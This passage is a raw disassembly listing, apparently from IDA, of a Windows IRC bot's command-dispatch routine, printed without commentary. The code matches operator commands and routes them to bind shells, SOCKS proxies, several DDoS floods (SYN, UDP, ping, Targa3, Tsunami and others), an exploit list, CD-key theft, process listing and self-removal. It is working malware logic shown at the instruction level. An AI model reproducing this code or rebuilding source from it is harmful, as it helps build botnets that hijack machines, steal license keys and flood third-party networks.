jz short loc_402F4E
push eax
push ecx
push offset dword_42FCC4
jmp loc_402AB7
; ---------------------------------------------------------------------------
loc_402F4E: ; CODE XREF: sub_40274D+7E3�j
; sub_40274D+7F3�j
push edi ; Str2
push offset dword_42FCBC ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_402D5D
mov esi, dword ptr [ebp+esi+4Ch+Args]
cmp esi, ebx
jz loc_402D5D
mov eax, [ebp+4Ch+Format]
cmp byte ptr [eax], 23h
jz loc_402D5D
push esi
push eax
push offset dword_42FCA4
jmp loc_402AB7
; ---------------------------------------------------------------------------
loc_402F87: ; CODE XREF: sub_40274D+848�j
push 32h
call ds:dword_42B014 ; Sleep
loc_402F8F: ; CODE XREF: sub_40274D+71F�j
cmp [ebp+4Ch+var_19F4], ebx
jz short loc_402F87
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_402F9C: ; CODE XREF: sub_40274D+64F�j
lea eax, [ebp+4Ch+var_D0]
push eax
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset asc_42FC60 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_402FC0: ; CODE XREF: sub_40274D+646�j
push dword ptr [ebp+esi+4Ch+Args] ; Str2
push offset aChat ; "CHAT"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_403102
cmp [ebp+4Ch+var_14], ebx
jz loc_4030DB
push 1Bh
call sub_40B075
test eax, eax
pop ecx
jnz loc_4030CA
push [ebp+esi+4Ch+var_98]
lea eax, [ebp+4Ch+var_2AB0]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
push [ebp+esi+4Ch+var_94] ; Str
call j__atol
mov [ebp+4Ch+var_2918], eax
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_2AB8], eax
push 7Fh ; Count
lea eax, [ebp+4Ch+var_D0]
push eax ; Source
lea eax, [ebp+4Ch+var_2998]
push eax ; Dest
call _strncpy
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_2910], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_290C], eax
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42FC38 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 1Bh ; int
push eax ; Source
call sub_40AE85
add esp, 34h
mov [ebp+4Ch+var_2914], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_2AB8]
push eax
push offset sub_418799
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2914]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4030BD
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42FC00
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_4030B5: ; CODE XREF: sub_40274D+976�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4030BD: ; CODE XREF: sub_40274D+955�j
cmp [ebp+4Ch+var_2908], ebx
jz short loc_4030B5
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_4030CA: ; CODE XREF: sub_40274D+89E�j
lea eax, [ebp+4Ch+var_D0]
push eax
push offset unk_42FBD0
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_4030DB: ; CODE XREF: sub_40274D+88E�j
lea eax, [ebp+4Ch+var_D0]
push eax
push offset unk_42FB9C
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_4030EC: ; CODE XREF: sub_40274D+62E�j
mov eax, [ebp+4Ch+var_10]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_43C08C
mov [edi], ecx
jnz loc_402B92
loc_403102: ; CODE XREF: sub_40274D+885�j
mov edi, [edi]
push edi ; Str2
push offset aLogin ; "login"
mov [ebp+4Ch+var_10], edi
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40A0B6
push edi ; Str2
push offset asc_42FB98 ; "l"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40A0B6
cmp [ebp+4Ch+var_14], ebx
jnz short loc_40314D
push dword ptr [ebp+4Ch+Args] ; Str2
push offset a332 ; "332"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_404979
loc_40314D: ; CODE XREF: sub_40274D+9E7�j
cmp [ebp+4Ch+arg_28], ebx
jnz loc_404979
xor edi, edi
cmp dword_43C498, ebx
jle loc_4032D6
mov [ebp+4Ch+var_14], offset dword_4D1450
loc_40316B: ; CODE XREF: sub_40274D+A3D�j
push [ebp+4Ch+var_10] ; Str2
push [ebp+4Ch+var_14] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_403191
add [ebp+4Ch+var_14], 0B8h
inc edi
cmp edi, dword_43C498
jl short loc_40316B
jmp loc_4032D6
; ---------------------------------------------------------------------------
loc_403191: ; CODE XREF: sub_40274D+A2D�j
push offset SubStr ; " :"
push [ebp+4Ch+arg_0] ; Str
call _strstr
cmp eax, ebx
pop ecx
pop ecx
jz loc_402B92
mov cl, byte_43C08C
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_43C08C
mov [eax+3], cl
push 9Fh ; Count
lea ecx, dword_4D1468[edi]
push ecx ; Source
add eax, 4
push eax ; Dest
call _strncpy
lea eax, dword_4D1450[edi]
add esp, 0Ch
mov [ebp+4Ch+var_14], 0Fh
mov [ebp+4Ch+var_24], eax
lea edi, [ebp+esi+4Ch+var_64]
loc_4031EC: ; CODE XREF: sub_40274D+B2A�j
push [ebp+4Ch+var_14]
lea eax, [ebp+4Ch+SubStr]
push offset aD ; "$%d-"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+SubStr]
push eax ; SubStr
push [ebp+4Ch+arg_0] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_403245
cmp [edi], ebx
jz short loc_403249
push [ebp+4Ch+var_24] ; Str
call _strlen
add [ebp+4Ch+var_18], eax
pop ecx
jz short loc_40326E
push dword ptr [edi-4] ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40326E
push eax ; Source
lea eax, [ebp+4Ch+SubStr]
push eax ; SubStr
push [ebp+4Ch+arg_0] ; Dest
call sub_41AB7D
add esp, 0Ch
jmp short loc_40326E
; ---------------------------------------------------------------------------
loc_403245: ; CODE XREF: sub_40274D+AC1�j
cmp [edi], ebx
jnz short loc_40326E
loc_403249: ; CODE XREF: sub_40274D+AC5�j
push 2 ; Count
lea eax, [ebp+4Ch+SubStr]
push eax ; Source
lea eax, [ebp+4Ch+var_A8]
push eax ; Dest
call _strncpy
lea eax, [ebp+4Ch+var_A8]
push eax ; Source
lea eax, [ebp+4Ch+SubStr]
push eax ; SubStr
push [ebp+4Ch+arg_0] ; Dest
mov [ebp+4Ch+var_A6], bl
call sub_41AB7D
add esp, 18h
loc_40326E: ; CODE XREF: sub_40274D+AD3�j
; sub_40274D+AE4�j ...
dec [ebp+4Ch+var_14]
sub edi, 4
cmp [ebp+4Ch+var_14], ebx
jg loc_4031EC
lea eax, [ebp+esi+4Ch+var_64]
mov [ebp+4Ch+var_14], 10h
mov edi, eax
loc_40328A: ; CODE XREF: sub_40274D+B80�j
push [ebp+4Ch+var_14]
lea eax, [ebp+4Ch+SubStr]
push offset aD_1 ; "$%d"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+SubStr]
push eax ; SubStr
push [ebp+4Ch+arg_0] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_4032C4
mov eax, [edi]
cmp eax, ebx
jz short loc_4032C4
push eax ; Source
lea eax, [ebp+4Ch+SubStr]
push eax ; SubStr
push [ebp+4Ch+arg_0] ; Dest
call sub_41AB7D
add esp, 0Ch
loc_4032C4: ; CODE XREF: sub_40274D+B5F�j
; sub_40274D+B65�j
dec [ebp+4Ch+var_14]
sub edi, 4
cmp [ebp+4Ch+var_14], ebx
jg short loc_40328A
mov [ebp+4Ch+var_8], 1
loc_4032D6: ; CODE XREF: sub_40274D+A11�j
; sub_40274D+A3F�j
mov eax, [ebp+4Ch+var_10]
mov al, [eax]
cmp al, byte_43C08C
jz short loc_4032EC
cmp [ebp+4Ch+var_8], ebx
jz loc_40349C
loc_4032EC: ; CODE XREF: sub_40274D+B94�j
push [ebp+4Ch+Source] ; Source
mov edi, [ebp+4Ch+arg_0]
push offset aMe ; "$me"
push edi ; Dest
call sub_41AB7D
lea eax, [ebp+4Ch+var_D0]
push eax ; Source
push offset aUser ; "$user"
push edi ; Dest
call sub_41AB7D
push [ebp+4Ch+Format] ; Source
push offset aChan ; "$chan"
push edi ; Dest
call sub_41AB7D
push ebx ; Str1
push ebx ; int
lea eax, [ebp+4Ch+SubStr]
push 2 ; int
push eax ; Dest
call sub_40AB83
push eax ; Source
push offset aRndnick ; "$rndnick"
push edi ; Dest
call sub_41AB7D
add esp, 40h
push [ebp+4Ch+arg_14] ; Source
push offset aServer ; "$server"
push edi ; Dest
call sub_41AB7D
mov edi, offset aChr ; "$chr("
push edi ; SubStr
push [ebp+4Ch+arg_0] ; Str
call _strstr
add esp, 14h
jmp loc_403420
; ---------------------------------------------------------------------------
loc_40335D: ; CODE XREF: sub_40274D+CD5�j
push edi ; SubStr
push [ebp+4Ch+arg_0] ; Str
call _strstr
mov [ebp+4Ch+var_24], eax
add eax, 5
push 4 ; Count
push eax ; Source
lea eax, [ebp+4Ch+SubStr]
push eax ; Dest
call _strncpy
lea eax, [ebp+4Ch+SubStr]
push offset asc_42FB58 ; ")"
push eax ; Str
call _strtok
add esp, 1Ch
cmp [ebp+4Ch+SubStr], 30h
jl short loc_403395
cmp [ebp+4Ch+SubStr], 39h
jle short loc_4033A8
loc_403395: ; CODE XREF: sub_40274D+C40�j
push 3 ; Count
lea eax, [ebp+4Ch+SubStr]
push offset Source ; "63"
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_4033A8: ; CODE XREF: sub_40274D+C46�j
lea eax, [ebp+4Ch+SubStr]
push eax ; Str
call j__atol
test eax, eax
pop ecx
jle short loc_4033C5
lea eax, [ebp+4Ch+SubStr]
push eax ; Str
call j__atol
pop ecx
mov [ebp+4Ch+var_A8], al
jmp short loc_4033D6
; ---------------------------------------------------------------------------
loc_4033C5: ; CODE XREF: sub_40274D+C67�j
call _rand
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+4Ch+var_A8], dl
loc_4033D6: ; CODE XREF: sub_40274D+C76�j
lea eax, [ebp+4Ch+SubStr]
push eax ; Str
mov [ebp+4Ch+var_A7], bl
call _strlen
push 0Ch ; Size
mov [ebp+4Ch+var_14], eax
lea eax, [ebp+4Ch+SubStr]
push ebx ; Val
push eax ; Dst
call _memset
mov eax, [ebp+4Ch+var_14]
add eax, 6
push eax ; Count
push [ebp+4Ch+var_24] ; Source
lea eax, [ebp+4Ch+SubStr]
push eax ; Dest
call _strncpy
lea eax, [ebp+4Ch+var_A8]
push eax ; Source
lea eax, [ebp+4Ch+SubStr]
push eax ; SubStr
push [ebp+4Ch+arg_0] ; Dest
call sub_41AB7D
push edi ; SubStr
push [ebp+4Ch+arg_0] ; Str
call _strstr
add esp, 30h
loc_403420: ; CODE XREF: sub_40274D+C0B�j
test eax, eax
jnz loc_40335D
mov edi, 1FFh
push edi ; Count
push [ebp+4Ch+arg_0] ; Source
lea eax, [ebp+4Ch+var_4590]
push eax ; Dest
call _strncpy
push edi ; Count
lea eax, [ebp+4Ch+var_4590]
push eax ; Source
lea eax, [ebp+4Ch+Str]
push eax ; Dest
call _strncpy
mov edi, offset asc_42FE58 ; " "
lea eax, [ebp+4Ch+Str]
push edi ; Delim
push eax ; Str
call _strtok
add esp, 20h
mov [ebp+4Ch+Str2], eax
mov [ebp+4Ch+var_24], 1
loc_403470: ; CODE XREF: sub_40274D+D3A�j
push edi ; Delim
push ebx ; Str
call _strtok
pop ecx
pop ecx
mov ecx, [ebp+4Ch+var_24]
inc [ebp+4Ch+var_24]
cmp [ebp+4Ch+var_24], 20h
mov [ebp+ecx*4+4Ch+Str2], eax
jl short loc_403470
lea eax, [ebp+esi+4Ch+Str2]
mov ecx, [eax]
cmp ecx, ebx
jz loc_402B92
add ecx, 3
mov [eax], ecx
loc_40349C: ; CODE XREF: sub_40274D+B99�j
mov edi, [ebp+esi+4Ch+Str2]
push edi ; Str2
push offset aRndnick_0 ; "rndnick"
mov [ebp+4Ch+var_10], edi
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40A067
push edi ; Str2
push offset aRn ; "rn"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40A067
push edi ; Str2
push offset aDie ; "die"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405446
push edi ; Str2
push offset aD_0 ; "d"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405446
push edi ; Str2
push offset aLogout ; "logout"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4053AE
push edi ; Str2
push offset aLo ; "lo"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4053AE
push edi ; Str2
push offset aVersion ; "version"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40539F
push edi ; Str2
push offset aVer ; "ver"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40539F
push edi ; Str2
push offset aDedication ; "dedication"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405395
push edi ; Str2
push offset aDed ; "ded"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405395
push edi ; Str2
push offset aSpeedtest ; "speedtest"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405382
push edi ; Str2
push offset aSt ; "st"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405382
push edi ; Str2
push offset aSecure ; "secure"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405288
push edi ; Str2
push offset aSec ; "sec"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405288
push edi ; Str2
push offset aUnsecure ; "unsecure"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405288
push edi ; Str2
push offset aUnsec ; "unsec"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405288
push edi ; Str2
push offset aBindshell ; "bindshell"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40518C
push edi ; Str2
push offset aBd ; "bd"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40518C
push edi ; Str2
push offset aBindshellstop ; "bindshellstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403643
push dword ptr [ebp+esi+4Ch+Args]
push 6
push offset aServer_0 ; "Server"
push offset dword_42FAAC
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403643: ; CODE XREF: sub_40274D+EDF�j
push edi ; Str2
push offset aSocks4 ; "socks4"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405074
push edi ; Str2
push offset aS4 ; "s4"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405074
push edi ; Str2
push offset aSocks4stop ; "socks4stop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403693
push dword ptr [ebp+esi+4Ch+Args]
push 19h
push offset aServer_0 ; "Server"
push offset dword_42FA84
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403693: ; CODE XREF: sub_40274D+F2F�j
push edi ; Str2
push offset aRloginstop ; "rloginstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4036B9
push dword ptr [ebp+esi+4Ch+Args]
push 9
push offset aServer_0 ; "Server"
push offset dword_42FA68
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4036B9: ; CODE XREF: sub_40274D+F55�j
push edi ; Str2
push offset aHttpstop ; "httpstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4036DF
push dword ptr [ebp+esi+4Ch+Args]
push 3
push offset aServer_0 ; "Server"
push offset dword_42FA4C
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4036DF: ; CODE XREF: sub_40274D+F7B�j
push edi ; Str2
push offset aLogstop ; "logstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403705
push dword ptr [ebp+esi+4Ch+Args]
push 25h
push offset aLogList ; "Log list"
push offset dword_42FA2C
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403705: ; CODE XREF: sub_40274D+FA1�j
push edi ; Str2
push offset aRedirectstop ; "redirectstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_40372B
push dword ptr [ebp+esi+4Ch+Args]
push 18h
push offset aTcpRedirect ; "TCP redirect"
push offset dword_42F9FC
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_40372B: ; CODE XREF: sub_40274D+FC7�j
push edi ; Str2
push offset aDdos_stop ; "ddos.stop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403751
push dword ptr [ebp+esi+4Ch+Args]
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_42F9D8
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403751: ; CODE XREF: sub_40274D+FED�j
push edi ; Str2
push offset aSynstop ; "synstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403777
push dword ptr [ebp+esi+4Ch+Args]
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_42F9B8
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403777: ; CODE XREF: sub_40274D+1013�j
push edi ; Str2
push offset aSkysynstop ; "skysynstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_40379D
push dword ptr [ebp+esi+4Ch+Args]
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_42F98C
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_40379D: ; CODE XREF: sub_40274D+1039�j
push edi ; Str2
push offset aTarga3stop ; "targa3stop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4037C3
push dword ptr [ebp+esi+4Ch+Args]
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_42F960
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4037C3: ; CODE XREF: sub_40274D+105F�j
push edi ; Str2
push offset aWonkstop ; "wonkstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4037E9
push dword ptr [ebp+esi+4Ch+Args]
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_42F93C
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4037E9: ; CODE XREF: sub_40274D+1085�j
push edi ; Str2
push offset aPacketstop ; "packetstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_40391E
mov esi, dword ptr [ebp+esi+4Ch+Args]
mov edi, [ebp+4Ch+arg_4]
push esi ; Str
push 0Dh ; int
push offset aDdosFlood ; "DDoS flood"
push offset dword_42F9D8 ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
push esi ; Str
push 0Eh ; int
push offset aSynFlood ; "Syn flood"
push offset dword_42F9B8 ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
add esp, 40h
push esi ; Str
push 17h ; int
push offset aUdpFlood ; "UDP flood"
push offset dword_42F918 ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
push esi ; Str
push 16h ; int
push offset aPingFlood ; "Ping flood"
push offset dword_42F900 ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
add esp, 40h
push esi ; Str
push 11h ; int
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_42F960 ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
push esi ; Str
push 12h ; int
push offset aWonkFlood ; "Wonk flood"
push offset dword_42F93C ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
add esp, 40h
push esi ; Str
push 0Fh ; int
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_42F8E0 ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
push esi ; Str
push 13h ; int
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_42F8C0 ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
add esp, 40h
push esi ; Str
push 10h ; int
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_42F98C ; int
push 1 ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push edi ; int
call sub_40B0BB
push ebx ; int
push [ebp+4Ch+var_4] ; int
push offset unk_42F88C ; int
push [ebp+4Ch+Format] ; Str
push edi ; int
call sub_40123B
add esp, 34h
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_40391E: ; CODE XREF: sub_40274D+10AB�j
push edi ; Str2
push offset aTsunamistop ; "tsunamistop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403944
push dword ptr [ebp+esi+4Ch+Args]
push 0Fh
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_42F8E0
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403944: ; CODE XREF: sub_40274D+11E0�j
push edi ; Str2
push offset aWisdomstop ; "wisdomstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_40396A
push dword ptr [ebp+esi+4Ch+Args]
push 13h
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_42F8C0
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_40396A: ; CODE XREF: sub_40274D+1206�j
push edi ; Str2
push offset aUdpstop ; "udpstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403990
push dword ptr [ebp+esi+4Ch+Args]
push 17h
push offset aUdpFlood ; "UDP flood"
push offset dword_42F918
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403990: ; CODE XREF: sub_40274D+122C�j
push edi ; Str2
push offset aPingstop ; "pingstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4039B6
push dword ptr [ebp+esi+4Ch+Args]
push 16h
push offset aPingFlood ; "Ping flood"
push offset dword_42F900
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4039B6: ; CODE XREF: sub_40274D+1252�j
push edi ; Str2
push offset aTftpstop ; "tftpstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4039DC
push dword ptr [ebp+esi+4Ch+Args]
push 5
push offset aServer_0 ; "Server"
push offset dword_42F844
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_4039DC: ; CODE XREF: sub_40274D+1278�j
push edi ; Str2
push offset aFindfilestop ; "findfilestop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40504B
push edi ; Str2
push offset aFfstop ; "ffstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40504B
push edi ; Str2
push offset aProcsstop ; "procsstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405039
push edi ; Str2
push offset aPsstop ; "psstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405039
push edi ; Str2
push offset aClonestop ; "clonestop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403A56
push dword ptr [ebp+esi+4Ch+Args]
push 1Fh
push offset aClone ; "Clone"
push offset dword_42F7F4
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403A56: ; CODE XREF: sub_40274D+12F2�j
push edi ; Str2
push offset aSecurestop ; "securestop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403A7C
push dword ptr [ebp+esi+4Ch+Args]
push 22h
push offset aSecure_0 ; "Secure"
push offset dword_42F7D0
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403A7C: ; CODE XREF: sub_40274D+1318�j
push edi ; Str2
push offset aScanstop ; "scanstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403AA2
push dword ptr [ebp+esi+4Ch+Args]
push 0Bh
push offset aScan ; "Scan"
push offset dword_42F7B0
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403AA2: ; CODE XREF: sub_40274D+133E�j
push edi ; Str2
push offset aScanstats ; "scanstats"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405026
push edi ; Str2
push offset aStats ; "stats"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405026
push edi ; Str2
push offset aTransferstats ; "transferstats"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405013
push edi ; Str2
push offset aTrstats ; "trstats"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405013
push edi ; Str2
push offset aConnectbacksta ; "connectbackstats"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405000
push edi ; Str2
push offset aCbstats ; "cbstats"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_405000
push edi ; Str2
push offset aExploitlist ; "exploitlist"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404FED
push edi ; Str2
push offset aExplist ; "explist"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404FED
push edi ; Str2
push offset aReconnect ; "reconnect"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404FCC
push edi ; Str2
push offset aR ; "r"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404FCC
push edi ; Str2
push offset aDisconnect ; "disconnect"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404FAA
push edi ; Str2
push offset aDc ; "dc"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404FAA
push edi ; Str2
push offset aQuit_0 ; "quit"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404F64
push edi ; Str2
push offset aQ ; "q"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404F64
push edi ; Str2
push offset aStatus ; "status"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404F29
push edi ; Str2
push offset aS_6 ; "s"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404F29
push edi ; Str2
push offset aId ; "id"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404EF5
push edi ; Str2
push offset aI ; "i"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404EF5
push edi ; Str2
push offset aReboot ; "reboot"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403C6B
call sub_41AEBB
test eax, eax
mov eax, offset asc_42F6EC ; "-"
jnz short loc_403C40
mov eax, offset unk_42F6C4
loc_403C40: ; CODE XREF: sub_40274D+14EC�j
push eax ; Format
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 1Ch
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_403C6B: ; CODE XREF: sub_40274D+14DE�j
push edi ; Str2
push offset aThreads ; "threads"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404E1D
push edi ; Str2
push offset aT ; "t"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404E1D
push edi ; Str2
push offset aAliases ; "aliases"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404E00
push edi ; Str2
push offset aAl ; "al"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404E00
push edi ; Str2
push offset aLog ; "log"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404D17
push edi ; Str2
push offset aLg ; "lg"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404D17
push edi ; Str2
push offset aClearlog ; "clearlog"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404CFE
push edi ; Str2
push offset aClg ; "clg"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404CFE
push edi ; Str2
push offset aNetinfo ; "netinfo"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404CCF
push edi ; Str2
push offset aNi ; "ni"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404CCF
push edi ; Str2
push offset aSysinfo ; "sysinfo"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404CA4
push edi ; Str2
push offset aSi ; "si"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404CA4
push edi ; Str2
push offset aRemove ; "remove"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404C6F
push edi ; Str2
push offset aRm ; "rm"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404C6F
push edi ; Str2
push offset aProcs ; "procs"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404B59
push edi ; Str2
push offset aPs ; "ps"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404B59
push edi ; Str2
push offset aGetcdkeys ; "getcdkeys"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404B35
push edi ; Str2
push offset aKey ; "key"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404B35
push edi ; Str2
push offset aUptime ; "uptime"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404AB7
push edi ; Str2
push offset aUp ; "up"
call _strcmp
test eax, eax
pop ecx
pop ecx
